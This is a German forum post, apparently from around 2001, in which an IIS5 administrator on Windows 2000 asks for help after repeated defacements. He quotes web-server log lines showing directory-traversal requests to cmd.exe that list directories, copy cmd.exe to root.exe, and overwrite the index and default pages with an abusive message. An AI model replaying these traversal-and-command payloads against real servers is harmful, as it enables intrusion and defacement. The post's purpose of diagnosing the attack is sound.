IIS 5 Hack
Hi,
Ich ahbe ein grosses Problem !
Jemand schafft es immer wieder eine Datei Namens "root.exe" auf mein IIS5 System zukopieren !
Anhand LogFiles sehe Ich folgendes was anscheinend über ein URL Aufruf geschieht !
Start LogFile:
----------------------
80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
80 GET /scripts/root.exe /c+echo+^^^^^^^^^^^^fuck+USA+Government^< /font^>^^^^fuck+PoizonBOx^^^^contact:sysadmcn@yahoo.co m.cn^>.././index.asp 502 -
Es geht noch weiter so !
Ergebnis: Es werden vier Dateien erstellt:
index.html
index.asp
default.html
default.asp
Meine originalen werden natürlich überschrieben
Bitte dringends um einen Tip oder Rat !
System:
-----------
Win2000 Svr + iis5
SP1
Patch wegen ISAPI Fehler im IIS5, seit 2.5.2001
Danke !
|